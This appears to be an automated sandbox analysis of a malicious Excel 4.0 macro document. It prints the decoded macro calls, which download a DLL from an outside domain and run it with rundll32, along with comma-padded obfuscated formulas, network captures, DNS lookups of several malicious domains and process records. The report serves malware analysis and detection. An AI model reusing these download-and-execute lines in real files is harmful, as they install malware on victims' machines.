                                                                                  CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
                                                                                  CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)
                                                                                  
                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 26, 2021 21:38:13.706429958 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:13.727715015 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:13.727855921 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:13.739692926 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:13.761064053 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:13.766139030 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:13.766165018 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:13.766292095 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:13.780644894 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:13.801815987 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:13.801839113 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:13.801974058 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.061072111 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.082371950 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207530022 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207556963 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207577944 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207593918 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207612991 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207634926 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207653046 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207685947 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.207865953 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207890034 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207897902 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.207915068 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.207918882 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.207942963 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.207961082 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.208637953 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.208661079 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.208683014 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.208692074 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.208709002 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.209446907 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.209518909 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.227010012 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.230285883 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.230305910 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.230438948 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.260128975 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260154009 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260202885 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260221004 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260317087 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.260431051 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260452986 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260462999 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.260472059 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.260483980 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.260507107 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.260992050 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.261018038 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.261039019 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.261064053 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.261079073 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.261682987 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.261706114 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.261724949 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.261765957 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.261779070 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.262449980 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.262471914 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.262491941 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.262512922 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.262526989 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.263205051 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.263228893 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.263248920 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.263262987 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.263286114 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.264012098 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.264034986 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.264055014 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.264070988 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.264087915 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.264657021 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.264707088 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.289442062 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.289469004 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.289488077 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.289505959 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.289633036 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.300046921 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.315654993 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.315682888 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.315701008 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.315711021 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.315884113 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.315959930 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.315982103 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.315998077 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.316020966 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.316040993 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.316479921 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.316503048 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.316523075 CET44349167172.67.150.228192.168.2.22
                                                                                  Jan 26, 2021 21:38:14.316545010 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.316560030 CET49167443192.168.2.22172.67.150.228
                                                                                  Jan 26, 2021 21:38:14.317241907 CET44349167172.67.150.228192.168.2.22

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 26, 2021 21:38:13.674966097 CET5219753192.168.2.228.8.8.8
                                                                                  Jan 26, 2021 21:38:13.691009045 CET53521978.8.8.8192.168.2.22
                                                                                  Jan 26, 2021 21:38:49.285402060 CET5309953192.168.2.228.8.8.8
                                                                                  Jan 26, 2021 21:38:49.301930904 CET53530998.8.8.8192.168.2.22
                                                                                  Jan 26, 2021 21:38:50.677171946 CET5283853192.168.2.228.8.8.8
                                                                                  Jan 26, 2021 21:38:50.692804098 CET53528388.8.8.8192.168.2.22
                                                                                  Jan 26, 2021 21:38:51.792762995 CET6120053192.168.2.228.8.8.8
                                                                                  Jan 26, 2021 21:38:51.808967113 CET53612008.8.8.8192.168.2.22

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Jan 26, 2021 21:38:13.674966097 CET192.168.2.228.8.8.80x78b6Standard query (0)rnollg.comA (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:49.285402060 CET192.168.2.228.8.8.80x6347Standard query (0)gadgetswolf.comA (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:50.677171946 CET192.168.2.228.8.8.80x4ebdStandard query (0)homesoapmolds.comA (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:51.792762995 CET192.168.2.228.8.8.80x4176Standard query (0)govemedico.tkA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Jan 26, 2021 21:38:13.691009045 CET8.8.8.8192.168.2.220x78b6No error (0)rnollg.com172.67.150.228A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:13.691009045 CET8.8.8.8192.168.2.220x78b6No error (0)rnollg.com104.21.11.254A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:49.301930904 CET8.8.8.8192.168.2.220x6347No error (0)gadgetswolf.com104.21.44.135A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:49.301930904 CET8.8.8.8192.168.2.220x6347No error (0)gadgetswolf.com172.67.200.147A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:50.692804098 CET8.8.8.8192.168.2.220x4ebdNo error (0)homesoapmolds.com172.67.198.109A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:50.692804098 CET8.8.8.8192.168.2.220x4ebdNo error (0)homesoapmolds.com104.21.60.169A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:51.808967113 CET8.8.8.8192.168.2.220x4176No error (0)govemedico.tk104.21.73.69A (IP address)IN (0x0001)
                                                                                  Jan 26, 2021 21:38:51.808967113 CET8.8.8.8192.168.2.220x4176No error (0)govemedico.tk172.67.158.184A (IP address)IN (0x0001)

                                                                                  HTTPS Packets

                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                  Jan 26, 2021 21:38:13.766165018 CET172.67.150.228443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                  Jan 26, 2021 21:38:49.396897078 CET104.21.44.135443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                  Jan 26, 2021 21:38:50.747139931 CET172.67.198.109443192.168.2.2249169CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                  Jan 26, 2021 21:38:51.860109091 CET104.21.73.69443192.168.2.2249170CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:21:37:41
                                                                                  Start date:26/01/2021
                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                  Imagebase:0x13f0f0000
                                                                                  File size:27641504 bytes
                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:21:37:47
                                                                                  Start date:26/01/2021
                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                                                  Imagebase:0xffe20000
                                                                                  File size:45568 bytes
                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:21:37:48
                                                                                  Start date:26/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                                                  Imagebase:0x780000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:21:38:18
                                                                                  Start date:26/01/2021
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:msiexec.exe
                                                                                  Imagebase:0xfe0000
                                                                                  File size:73216 bytes
                                                                                  MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >